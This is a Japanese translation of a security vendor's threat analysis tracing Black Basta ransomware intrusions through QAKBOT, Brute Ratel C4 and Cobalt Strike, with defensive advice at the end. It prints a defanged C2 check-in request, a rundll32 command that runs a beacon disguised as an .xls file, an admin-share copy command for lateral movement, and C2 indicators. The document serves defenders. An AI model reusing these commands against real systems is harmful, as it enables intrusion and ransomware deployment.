ランサムウェア
QAKBOT、Brute Ratel、Cobalt Strikeを駆使するランサムウェアBlack Bastaの攻撃を解説
トレンドマイクロでは、QAKBOT関連ケースの解析から、ランサムウェアBlack Bastaの攻撃者のペイロードBrute Ratel C4およびCobalt Strikeとの関連を突き止めました。
概要
マルウェアQAKBOTの活動は、短い休止期間を経て2022年9月8日に再開され、いくつかの拡散手法の更新が確認されました。それらは、ランサムウェアSmokeLoader(「snow0x」というディストリビュータIDを使用)やEMOTET(「azd」というディストリビュータIDを使用)などのマルウェア、さらに「BB」や「Obama20x」というディストリビュータIDを使用したスパム攻撃の手法によるものでした。
QAKBOTが「BB」を使用した最近の事例では、Cobalt Strikeと似た機能を持つペネトレーションテストツールBrute Ratel(「Backdoor.Win64.BRUTEL」として検出対応)が第二段階のペイロードとして展開されたケースがあげられます。この事例は、QAKBOT感染事例の第二段階ペイロードとしてBrute Ratelが確認された初めてのケースであり、注目すべき展開といえます。また、この攻撃事例では、Cobalt Strikeも同様に水平移動・内部活動に使用されていました。この点からも、これら一連の攻撃活動では、ランサムウェアBlack Bastaの背後にいる攻撃グループの関与が推測されます。
侵入活動のタイムライン
/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba/F01-JP.jpg)
Brute Ratelなど、C&Cのフレームワークを駆使した攻撃手法の台頭
Brute Ratelは、有償の敵対的攻撃シミュレーションツールであり、Cobalt Strikeなどの良く知られたツールとも競合する有償C&C向けフレームワークツールの中では比較的新しいものといえます。
Brute RatelやCobalt Strikeといった敵対的攻撃シミュレーションツールは、本来、侵入テストの専門家(レッドチーム)向けに販売され、企業や組織でのサイバー攻撃検知や対応に際して正規の侵入テストで使用されます。これにより攻撃者がネットワーク侵入に使用する「戦術、技術、手順(TTP)」を再現します。また、リモートアクセスによるキーボードからの操作も可能となっています。
Cobalt Strikeは、正規の目的で使用されるだけでなく、過去数年、ランサムウェア攻撃において不正に使用され、攻撃者の間で広く普及したことで有名になりました。特に以下のボットネット型マルウェアによる第二段階ペイロードとして使用されています。Cobalt Strikeの複数のバージョンは、過去数年間で情報が広く共有され、サイバー犯罪者による悪用を加速させている状況にあります。
- QAKBOT(「TrojanSpy.Win64.QAKBOT」として検出対応)
- IcedID(「TrojanSpy.Win64.ICEDID」として検出対応)
- Emotet(「TrojanSpy.Win64.EMOTET」として検出対応)
- Bumblebee(「Trojan.Win64.BUMBLELOADER」として検出対応)
Cobalt Strikeによる攻撃は、広く使用されているため、検出範囲も大きくなっています。こうした中、Brute Ratelやその他のあまり知られていないツールの場合は、長い期間検出されない可能もあり、攻撃者にとって魅力的な選択肢となっています。
Brute Ratelの場合、最近になってサイバー犯罪のアンダーグラウンド市場で活発に取引されており、悪用するためにカスタマイズされたバージョンなどが出回っていることから、攻撃者の関心を集めています。Brute Ratelの詳細がどのようにして漏えいしたかは不明ですが、同ツールの開発者はTwitterでこうした現状を認めています。
QAKBOTの「BB」から「Brute Ratel」を駆使する攻撃活動
/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba/F02-JP.jpg)
この攻撃活動は、不正なURLを含むスパムメールの送信から開始されます。受信者がこのURLのランディングページを閲覧すると、パスワードの提示と合わせてZIPファイルがダウンロードされます。
/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba/F03.jpg)
サンドボックスとセキュリティソリューションの回避
この段階でパスワードで保護されたZIPファイルが使用されるのは、セキュリティソリューションによる検知を回避するためと推測されます。
Webからの痕跡を回避する
このZIPファイルには、単一のISOファイルが含まれています。ISOファイルの使用は、インターネットからダウンロードされたファイルであるとタグ付けされる「Webからの痕跡(Mark of the Web: MOTW)」を無効にするためと推測されます。通常、インターネットからのファイルは、Windowsやエンドポイントセキュリティソリューションによるセキュリティ対策の対象となるからです。
ISOファイルには、「エクスプローラ」のアイコンで表示されたLNKファイルと、それぞれのファイルやディレクトリを含む非表示のサブディレクトリが2つ含まれています。Windowsのオペレーティングシステムは、デフォルトではこれら非表示のファイルはユーザから見えなくなっています。図5は「非表示のファイルを表示させる」の設定が有効な場合に確認される内容を示しています。
/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba/F04.jpg)
ディレクトリ構成は以下のとおりとなります。
/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba/F05.jpg)
こちらの表をご参照ください。
表1:感染フローの最初の段階で示されたファイル名、検出名、ハッシュ値
コマンドラインインターフェース - 実行手順
QAKBOTは、JavaScript(.js)およびバッチスクリプト(.cmd)の2つのスクリプトファイルに対して難読化を施すことで、疑わしいコマンドラインの隠ぺいを試みていると考えられます。
/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba/F06-JP.jpg)
QAKBOTのC&Cサーバによる最初の通信
QAKBOTが使用するC&Cインフラは、物理的には主に家庭用インターネットサービスプロバイダ(ISP)のブロードバンドネットワークの感染端末上に分散しています。
特に以下の国々にC&Cサーバが存在しています。
- アフガニスタン
- アルジェリア
- アルゼンチン
- オーストリア
- ブラジル
- ブルガリア
- カナダ
- チリ
- コロンビア
- エジプト
- インド
- インドネシア
- 日本
- メキシコ
- モンゴル
- モロッコ
- オランダ
- カタール
- ロシア
- 南アフリカ共和国
- 台湾
- タイ
- トルコ
- アラブ首長国連邦
- イギリス
- 米国
- ベトナム
- イエメン
これらの主要ないわゆる「レベル1」のC&Cサーバは、QAKBOTの攻撃者からは「使い捨て」と見なされているようで、頻繁に(新たな拡散活動のたびに)交換されてます。ただし中には、複数のQAKBOTによる攻撃活動に長きに渡って使用されているケースもあるようです。
自動化された偵察用のコマンド
最初のC&C通信からわずか6分後、マルウェアQAKBOTは、感染端末に組み込まれたプロセス(wermgr.exe)内で実行され、さらに複数の内蔵コマンドラインツールも駆使され、感染環境下で自動の偵察活動が実行されます。これらのコマンドラインは、以下の順序で実行されます。
こちらの表をご参照ください。
表2:内蔵コマンドラインの実行順序
この活動は、Windows内蔵コマンドの不審な使用を検出するTrend Micro Vision One™で以下のように確認することができます。
/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba/F07.jpg)
QAKBOTによって作成されるBrute Ratel
自動化された偵察活動が完了した5分後、QAKBOTが組み入れたプロセスwermgr.exeは、Brute RatelというDLLファイルを作成します。その際、メインのエクスポート機能を備えた子プロセスであるrundll32.exeを介して、このファイルの呼び出しが実行されます。
/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba/F08.jpg)
バックドア活動は、HTTPSとして以下のURLでBrute Ratel Serverのチェックインを実行します。
symantecuptimehost[.]com
POST hxxps://symantecuptimehost[.]com:8080/admin.php?login= HTTP/1.1
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Host: symantecuptimehost[.]com:8080
Content-Length: 122
Cache-Control: no-cache
/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba/F09.jpg)
さらに、特権ユーザを確認するため、感染環境内の偵察活動を行います。その際、内蔵されたnet.exeおよびnltest.exeが最初に使用されます。
こちらの表をご参照ください。
表3:特権ユーザを確認するための偵察活動プロセス
次にユーティリティSharpHoundにより、BloodHoundに取り込まれるJSONファイル(Active Directoryの組織単位、グループポリシー、ドメイン、ユーザーグループ、コンピュータ、ユーザなどの情報を含む)を出力するため、内蔵されたプロセスsvchost.exeでBrute Ratel を介して実行されます。その後、当該ファイルは、情報送出流出のためにZIPファイルに圧縮されます。このプロセスはすべてスクリプト化されており、2秒以内に完了します。
/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba/F10.jpg)
Cobalt Strikeを作成するBrute Ratel
興味深い点は、攻撃者が水平移動・内部活動をする際、Cobalt Strikeを活用していたことです。そしてBrute Ratel C4を共有する感染端末のエンドポイント上に、複数のビーコンファイルのうち最初のものが作成されていました。
C:\Users\Public\Name-123456.xls
このビーコンファイルは、Brute Ratel C4が動作している同一ホスト上で以下のコマンドにより実行されていました。
rundll32 C:\users\public\Name-123456.xls,DllRegisterServer
さらに攻撃者は、他のビーコンファイルを作成した上で、それらをネットワーク上の他のホストの管理用共有フォルダに同じくXLS添付のファイル名でコピーしていました。
C:\Users\Public\abcabc.xls
C:\Users\Public\abc-1234.xls
C:\Users\Public\Orders_12_34_56.xls
C:\Users\Public\MkDir.xls
ファイルのコピーに使用するコマンドは次のとおりです。
C:\WINDOWS\system32\cmd.exe /C copy C:\users\public\fksro.xls
\\<HOST>\C$\users\public\abcabc.xls
ビーコンファイルのC&Cサーバは、以下のとおりとなります。
hxxps://fewifasoc[.]com | 45.153.242[.]251
hxxps://hadujaza[.]com | 45.153.241[.]88
hxxps://himiketiv[.]com | 45.153.241[.]64
これにより、最終的な不正活動の前に感染環境には他の攻撃者はいないことが確認されます。こうしたアクセス範囲や調査活動のレベルから、最終的には「ドメイン全体を攻撃対象にした身代金要求の活動」であった可能性が高いと推測されます。
QAKBOTの「Obama」から「Brute Ratel」を駆使する攻撃活動
さらに最近の事例としてトレンドマイクロは、「Obama」というディストリビュータIDの接頭辞(例:「Obama208」)を使用したQAKBOTが、第二段階のペイロードとして「Brutel Ratel C4」を駆使しているケースを確認しました。
この場合、QAKBOTは、パスワードで保護されたZIPファイルとして対象の端末に侵入した後、HTMLスマグリングの手法により、暗号化された不正スクリプトがHTMLの添付ファイルやウェブページに「スマグリング(密輸)」されます。これにより、ユーザが感染端末のブラウザでHTMLページを開くと、不正スクリプトが復号され、ペイロードが展開されることになります。
/2black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba/F11.jpg)
HTMLの添付ファイルで提供されたパスワードを使ってZIPファイルを復号すると、ユーザへISOファイルが表示されます。不正なファイルは、このISOファイルに含まれており、Webバイパスのマークとして使用されます。ISOファイルの内部は、以下のようなディレクトリ構造になっています。
/2black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba/F12.jpg)
QAKBOTは、今回の「復活」以来、スクリプト言語、ファイル拡張子、エクスポート関数や序数を使用するなど、攻撃フローの多様化が確認されています。そして今回の感染事例では、以下のバリエーションが使用されました。
/2black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba/F13.jpg)
冒頭の攻撃フローで説明したものと同じTTP(戦術、技術、手順)がこの感染事例でも展開されていました。ただし、C&Cの設定に1つだけ顕著な違いが確認されました。従来のHTTPS C&C チャンネルに対して、ここではDNS over HTTPS(DoH)が使用されていた点です。そして今回確認されたC&Cサーバでは、Let's-EncryptによるHTTPSが使用されていました。
DoHを使用することで、攻撃者はC&CドメインからのDNSクエリを隠ぺいすることが可能となります。こうしてSSL/TLSトラフィックが中間者(MitM)の手法などで監視されていない限り、C&CサーバへのDNSクエリは気付かれないままとなります。
/2black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba/F14.jpg)
ランサムウェア「Black Basta」との関連性
/2black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba/F15.jpg)
調査の結果、QAKBOTからBrute Ratelへ至り、さらにCobalt Strikeを利用するような攻撃段階から、ランサムウェア「Black Basta」の背後にいる攻撃グループの関連が把握されます。Black Bastaの攻撃で観察されたTTPおよびインフラが今回でも使用されていたからです。なお、QAKBOTの攻撃でBlack Bastaとの関連が把握されたのは、今回が初めてではありません。
結論およびセキュリティに関する推奨事項
ユーザは、これらのベストプラクティスに従うことで、QAKBOTの新たな亜種やメールを介して広がるその他の脅威を阻止することができます。
- メールから添付ファイルをダウンロードしたり、埋め込まれたリンクを選択する前にまずメールの送信者と内容を確認すること
- 埋め込みリンクの上にカーソルのポインタを置くとリンク先が表示されるので、これによりURLを確認すること
- 送信者の身元を確認すること。見慣れないメールアドレス、メールと送信者名の不一致、会社のメールになりすましたものなどは、不正メールを示す兆候と判断すること
- もし正規の会社からであると主張するメールであっても、不審に点がある場合は、メールのリクエストに対応する前に、その会社が本当にそのメールを送ってきたのかどうかを確認すること。
企業や組織は、Cobalt Strike、LOLBin(Living-Off-the-Land Binaries、環境寄生型)のバイナリ、レッドチームによる侵入テスト用ツール(Brutel Ratel C4など)といった、正規のツールが攻撃で悪用される傾向についても注意を払う必要があります。
また、MDR(Managed Detection and Response)のソリューションは、高度な人工知能を活用して脅威を関連付け、優先順位を判断し、より大きな攻撃の一部であるかどうかを把握することで、企業や組織のシステムを保護することができます。MDRは、脅威が実行される前に検知し、さらなる侵害を防ぐことができます。
既知のマルウェアの巧妙な亜種が次々と出現し、まったく未知の脅威も出現している中、高度な検知・対応能力を持つソリューションが求められています。こうしたニーズに対してTrend Micro Vision Oneは、メール、エンドポイント、サーバ、クラウドワークロード、ネットワークなど、複数のセキュリティレイヤーのデータを収集し、自動的に相関させる強力なXDR機能を提供できるテクノロジーであり、自動化された保護機能によって攻撃を阻止し、重大なインシデントも見過ごしません。
参考記事
「Black Basta Ransomware Gang Infiltrates Networks via QAKBOT, Brute Ratel, and Cobalt Strike」
By: Ian Kenefick, Lucas Silva, Nicole Hernandez
翻訳:与那城 務(Core Technology Marketing, Trend Micro™ Research)